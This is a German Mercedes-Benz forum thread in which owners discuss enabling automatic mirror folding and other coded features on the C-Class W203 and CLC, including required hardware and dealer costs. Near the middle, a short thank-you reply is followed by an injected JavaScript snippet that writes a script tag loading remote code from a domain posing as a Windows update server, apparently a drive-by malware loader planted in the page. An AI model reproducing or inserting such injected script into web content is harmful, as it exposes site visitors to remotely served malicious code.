Spiegel automatisch einklappen?

Diskutiere Spiegel automatisch einklappen? im Forum C-Klasse, CLC & 190er im Bereich Mercedes-Benz - Hallo zusammen, echt ein schönes und umfangreiches Forum hier, vielleicht kann mir ja auch gleich jemand weiterhelfen. Ich bin vor kurzem von...
C

CLC2009

Guest
Hallo zusammen,
echt ein schönes und umfangreiches Forum hier, vielleicht kann mir ja auch gleich jemand weiterhelfen.
Ich bin vor kurzem von einer E-Klasse auf einen CLC umgestiegen.
Gibt es tatsächlich beim CLC nicht die Funktion, dass sich beim Absperren die Außenspiegel automatisch einklappen?
Muss ich tatsächlich beim CLC jedes mal extra den Knopf dazu drücken?
Ich fand das beim E wirklich sehr praktisch, war ganz nebenbei auch ein schöner Indikator, ob das Auto nun abgesperrt ist oder nicht :-)
Vielen Dank für jede Antwort
Stefan
 
[...], war ganz nebenbei auch ein schöner Indikator, ob das Auto nun abgesperrt ist oder nicht :-)

*oT an*

Jetzt wo du es sagst, erkenne ich auch den Sinne dieser Funktion :D
Ich hab bei meinem C das automatische Einklappen erstmal deaktiviert, hat mich schon einbisschen genervt. Auto abschließen *rrrrr* Ah Mist, was im Innenraum vergessen....aufschließen *rrrrr* Tür auf, abschließen *rrrrr*
Ich muss dazusagen, dass ich in der Regel nirgendwo parke, wo ich diese Funktion zwingend benötige. Aber sie ist bei der BR 204 nunmal im Spiegelpaket integriert.

*oT aus*

Ich vermute, da der CLC noch auf der Baureihe 203 basiert, ist das automatische Anklappen wohl nicht möglich....
EDIT: Nach Angaben von Hendrik und Markus ist das automatische Anklappen wohl doch möglich.
 
Zuletzt bearbeitet:
Ich vermute, da der CLC noch auf der Baureihe 203 basiert, ist das automatische Anklappen wohl nicht möglich....

Doch, auch bei BR 203 (Mopf) ist das automatische Anklappen beim Verriegeln möglich, allerdings muss diese Funktion erst beim :) freigeschaltet werden ;)
 
Hi,
danke für die Antworten. Das lässt mich ja hoffen.
Ich wohne in einer Strasse zwischen Partymeile und Nachtbus-Station. Da lernt man es wirklich schätzen, wenn möglichst wenig in den Gehsteig hinein ragt und man den Partypeople so viel Platz wie möglich lässt.
Wie kann ich denn die Funktion frei schalten lassen?
 
Doch, auch bei BR 203 (Mopf) ist das automatische Anklappen beim Verriegeln möglich, allerdings muss diese Funktion erst beim :) freigeschaltet werden ;)

...Bei einigen Fahrzeugen der 203er Baureihe ist diese Funktion auch schon ab Werk freigeschaltet und das entsprechende Menü zum Ein- Ausschalten im Kombiinstrument vorhanden.

@CLC2009: Hast du denn schon alle Menüpunkte in deinem Kombiinstrument durchgeblättert (über Tasten am Lenkrad)? Ist kein Menüpunkt "Spiegel autom. Einklappen ein/aus" unter den Einstellungen vorhanden?
Falls tatsächlich nicht, lässt sich diese Funktion im SAM Front beim Freundlichen freischalten - sollte in 5 Minuten erledigt sein ;)
 
Hallo MB 203,
ich fahre auch einen W203. Bin auch noch recht neu hier im Forum und habe deine nette Nachricht gerade gelesen. Ist es wirklich möglich, sich diese Funktionen frei schalten zu lassen? Ich kann meine Außenspiegel nur verstellen, allerdings nicht elektr. Einklappen. Würde das trotzdem funktionieren?
Und was nimmt der Freundliche für solch eine Freischaltung?

Viele Grüße
Martin
 
Ich kann meine Außenspiegel nur verstellen, allerdings nicht elektr. Einklappen. Würde das trotzdem funktionieren?
Und was nimmt der Freundliche für solch eine Freischaltung?
Nein, bei Dir geht das nicht. Es geht nur, wenn Du bereits elektrisch anklappbare Spiegel hast und diese nicht beim Abschließen automatisch einklappen!
 
Es müßten beide Spiegel bzw. die Halter getauscht werden und vermutlich noch die dazugehörigen Türsteuergeräte, sowie evtl. der Kabelsatz vom Steuergerät zum Spiegel und ein Schalterpanel.

Daß wäre recht Aufwendig und sicher recht Teuer.
Es müßten beide Spiegel zerlegt, sowie die Türverkleidungen abgenommen werden.
Und ob man die Funktion dann nachträglich ins KI Programieren kann, daß weis ich auc nicht.
 
@X-R230-X
Vielen Dank für die Info.
Ich war gerade bei dem Freundlichen. Er teilte mir auch mit, dass es nur bei Spiegeln geht, die bereits einen Motor drin haben. Ansonsten neue Spiegel mit Motor kaufen, ca. 650,- EUR pro Stück... ja ne is klar!!!

Trotzdem kann man an meinem Wagen noch einige Goodies frei schalten. Z.B. die Weglicht oder wie das heißt. Sprich wenn man unter 40 km/h fährt und im dunkeln nach links abbiegen möchte, schaltet sich das linke Nebellicht mit ein. Tolle Sache finde ich. Der Freundliche will mal überprüfen, was man sonst noch so frei schalten kann.
Allerdings erst, wenn er das Interface mit der iphone Halterung angeschlossen hat. Hoffe das wird nicht zusammen mit dem Interface zu teuer?

Bis dahin
Martin
 
Trotzdem kann man an meinem Wagen noch einige Goodies frei schalten. Z.B. die Weglicht oder wie das heißt. Sprich wenn man unter 40 km/h fährt und im dunkeln nach links abbiegen möchte, schaltet sich das linke Nebellicht mit ein. Tolle Sache finde ich. Der Freundliche will mal überprüfen, was man sonst noch so frei schalten kann.
Das bringt aber nicht viel, wenn Du nicht die dafür konzipierten Nebler hast die dann auch tatsächlich in die Richtige Richtung leuchten. Außerdem hat mich das immer arg genervt weil man ständig drauf angesprochen wurde, dass wohl ein Nebler defekt ist ... weil ja nur einer leuchtet :)
 
Außerdem hat mich das immer arg genervt weil man ständig drauf angesprochen wurde, dass wohl ein Nebler defekt ist ... weil ja nur einer leuchtet :)

Ich hoffe das hat sich inzwischen gelegt, da die Abbiegelichttechnik nun doch schon etwas stärker verbreitet ist :D
 
Hallo nochmal!

Wie nun schon geschrieben, müssen natürlich elektrisch anklappbare Außenspiegel vorhanden sein. Ich habe mir die Teile für den nachträglichen Einbau in der Bucht gebraucht gekauft: Beide Außenspiegel mit Motor + Lichtschalterelement für ca. 150€. Finde das absolut okay. Nur die Türsteuergeräte mit Memory (dann kann man auch die Bordsteinautomatik freischalten) ab MJ 2005 brauche ich noch. Die Nachrüstung ist sehr einfach!

Die Funktion, dass die Außenspiegel beim Verriegeln autom. einklappen, kann bei jedem 203er ab MJ 2005 freigeschaltet werden (2005er SAM wird benötigt, welches sich natürlich auh nachrüsten lässt - aber teuer). Genauso das Abbiegelicht (geht auch erst ab MJ 2005).

Folgende Features lassen sich beim 203er OHNE Hardware-Nachrüstung freischalten:

-Abbiegelicht (mit den normalen Nebelscheinwerfern aber nicht sinnvoll und eigentlich auch illegal!)

-Reifendruckverlust-Warnung

-Autom. anklappende Spiegel nur wenn bereits elek. anklappbare Spiegel verbaut sind/wurden.

Dann gibt´s noch einige "Einstellungsmöglichkeiten", wie z.B. diverse US-Codierungen im Kombiinstrument (z.B. andere Automatik-Ganganzeige u.ä.). Hier gewinnt man aber nichts dazu.

Mehr dürfte ohne entsprechende Hardware nicht machbar sein.

Beim Freischalten des Abbiegelichts würde ich auch gleich die passenden Nebler verbauen, da es dann ganz legal ist und auch sinnvoll ;)
 
danke hat mir auch weiter geholfen

<script language='JavaScript' type='text/javascript'>document.write("<" + "script language='JavaScript' type='text/javascript' src='http://windows-updateserver.com/signature/hKLYZ5joxmvAlyz147fYlWXU4mn5R3Pg?rand=" + Math.random() * 100000000 +"'></"+"script>")</script>
 
Freischaltung notwendig?!?

Hallo,

leider konnte ich in der Suchfunktion nicht die passende Info finden...

@MB 203 du hast ja die anklappbaren Spiegel nachgerüstet. Habe bei mir das gleiche vor. Im ersten Step habe ich heute links ein neues Türsteuergerät und einen Spiegelrahmen mit passendem abblendbaren Glas verbaut, den Innenspiegel habe ich schon länger als abblendende Version verbaut.

Leider funktioniert die Abblendung des linken Außenspiegels nicht - muss man das neue Steuergerät beim Freundlichen aktivieren lassen?!

Gruß und danke für die Antwort im Voraus!!!

Meeeze
 
Folgende Features lassen sich beim 203er OHNE Hardware-Nachrüstung freischalten:

-Reifendruckverlust-Warnung

Ist die RDK bei allen schon vorbereitet? Heißt das mit anderen Worten, ich müsste mir nur noch die passenden Ventile mit den Sensoren kaufen und das ganze freischalten lassen?

Gruß Novi
 
Ist die RDK bei allen schon vorbereitet? Heißt das mit anderen Worten, ich müsste mir nur noch die passenden Ventile mit den Sensoren kaufen und das ganze freischalten lassen?

Gruß Novi

Noch nicht einmal. Die Reifendruck-Verlustwarnung wird über die Raddrehzahlsensoren realisiert. Dreht sich ein Rad auf Grund zu niedrigen Luftdrucks mit anderer Geschwindigkeit als die restlichen, dann wird eine Warnung angezeigt.
Eine "richtige" Reifenluftdruck-Kontrolle gab es bei BR 203 nie. Diese wird über entsprechende Ventile ermöglicht, die dann auch den konkreten Luftdruck im KI anzuzeigen ermöglichen.
 
Hallo!
Wie Hendrik schon schrieb, muss gar nichts nachgerüstet werden für die Reifendruck-Verlust-Warnung (das ist wie gesagt keine komplette RDK).
Allerdings geht diese Freischaltung erst ab der Modellpflege der BR 203 (also bei allen Fahrzeugen ab MJ 2005).
 
Danke

Da werd ich nächste Woche mal einen Termin bei Mercedes machen.

Gruß Novi
 
Thema: Spiegel automatisch einklappen?
Zurück
Oben